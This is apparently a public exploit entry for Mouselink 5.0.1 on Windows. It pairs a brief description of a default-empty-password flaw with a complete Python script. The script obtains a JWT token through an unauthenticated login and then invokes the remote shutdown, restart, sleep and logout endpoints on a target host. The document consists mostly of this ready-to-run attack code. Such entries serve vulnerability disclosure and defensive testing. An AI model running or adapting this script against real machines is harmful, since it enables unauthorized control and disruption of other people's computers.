# Exploit Title: Mouselink 5.0.1 - Remote System Control
# Date: 25/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mouselink.app/
# Software Link: https://blob.mouselink.app/mouselink-win-Setup.exe
# Version: 5.0.1
# Tested on: Windows 10

'''
Description:

Mouselink 5.0.1 allows remote attackers to control system functions
(shutdown, restart, sleep, logout). By default, no password is configured,
allowing an attacker to obtain a valid JWT token and invoke privileged
/api/PCControl/* endpoints, leading to unauthorized system operations.

'''
#!/usr/bin/env python3

import requests
import argparse

SERVER_IP = "192.168.8.105"
SERVER_PORT = 11521
BASE_URL = f"http://{SERVER_IP}:{SERVER_PORT}"

def login_and_get_token():
    try:
        response = requests.get(
            f"{BASE_URL}/api/login",
            params={"username": "blue0x1", "password": ""},
            headers={
                "User-Agent": "Dart/3.5 (dart:io)",
                "Accept-Encoding": "gzip",
                "Host": f"{SERVER_IP}:{SERVER_PORT}"
            },
            timeout=5
        )
        if response.status_code == 200 and response.json().get("success"):
            return response.json()["data"]["key"]
    except:
        pass
    return None

def send_pc_control_command(token, action):
    endpoint = f"{BASE_URL}/api/PCControl/{action}"
    headers = {"Authorization": f"Bearer {token}"}
    try:
        response = requests.get(endpoint, headers=headers)
        data = response.json()
        if data.get("success") == True:
            print(f"[+] {action} request sent successfully.")
        else:
            print(f"[-] {action} failed.")
    except:
        print(f"[-] Error while sending {action} request.")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Mouselink Remote PC
Control Exploit")
    parser.add_argument("--shutdown", action="store_true", help="Trigger
system shutdown")
    parser.add_argument("--restart", action="store_true", help="Trigger
system restart")
    parser.add_argument("--sleep", action="store_true", help="Put system to
sleep")
    parser.add_argument("--logout", action="store_true", help="Log out
current user")

    args = parser.parse_args()
    token = login_and_get_token()
    if not token:
        print("[-] Failed to obtain JWT token.")
        exit(1)

    if args.shutdown:
        send_pc_control_command(token, "Shutdown")
    elif args.restart:
        send_pc_control_command(token, "Restart")
    elif args.sleep:
        send_pc_control_command(token, "Sleep")
    elif args.logout:
        send_pc_control_command(token, "Logout")
    else:
        print("[-] No action specified. Use --shutdown, --restart, --sleep,
or --logout.")